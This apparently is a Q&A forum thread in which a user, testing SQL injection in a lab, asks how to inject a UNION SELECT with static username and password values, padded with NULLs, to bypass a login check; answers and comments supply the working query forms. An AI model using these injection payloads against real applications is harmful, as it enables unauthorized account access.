0

I'm testing SQL injection in my lab and need to combine two SQL queries using UNION to bypass authentication, so I would like to know if there is a way to set static values in second query, so that my JAVA code will check will only check for the user password I send as static password : The SQL Query should be like this : 

 SELECT * FROM users WHERE user = 'user1' UNION SELECT user AS 
 user1, password AS password FROM users ;'

My JAVA code reports an error : 

 You have an error in your SQL syntax; check the manual that 
 corresponds to your MySQL server version for the right syntax to 
 use near
Improve this question
1
  • Remove the semicolon? Commented Dec 19, 2018 at 20:04

2 Answers 2

Reset to default
3

First, eliminate the use of SELECT * to make sure both queries return the same number of columns. Then you can hard code your static values in the second query.

SELECT user, password
    FROM users
    WHERE user =  'user1'
UNION
SELECT 'user', 'password';
Improve this answer
Sign up to request clarification or add additional context in comments.

2 Comments

Theorically I have no control on the first query so I can't change it, in this case I think I can ad NULL values to match the first queries size. ` SELECT * FROM users WHERE user = 'user1' UNION SELECT 'user', 'password', 'Null', 'null'; `
@AzizAzizos Yes, you can add NULLs to the second query to match the number of columns returned by the first, but do not enclose them in single quotes. If you do, you'll get the literal string 'NULL' instead of a true NULL value.
2

Using union
You must select the corresponding number type of column eg: 

 SELECT user, password
 FROM users 
 WHERE user = 'user1' 
 UNION 
 SELECT 'user', 'password' 
  ;
Improve this answer

3 Comments

Probably, the query after the UNION is the one that should be modified (that's the one injected). Anyway, I think it's a good answer.
The second query should be static (Hard coded), I don't want the code to grab anything from the database
The second query will return one row of 'user', 'password' for every row in the users table. UNION will, of course, then eliminate the duplicates, but it's still kind of silly and inefficient to do.

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.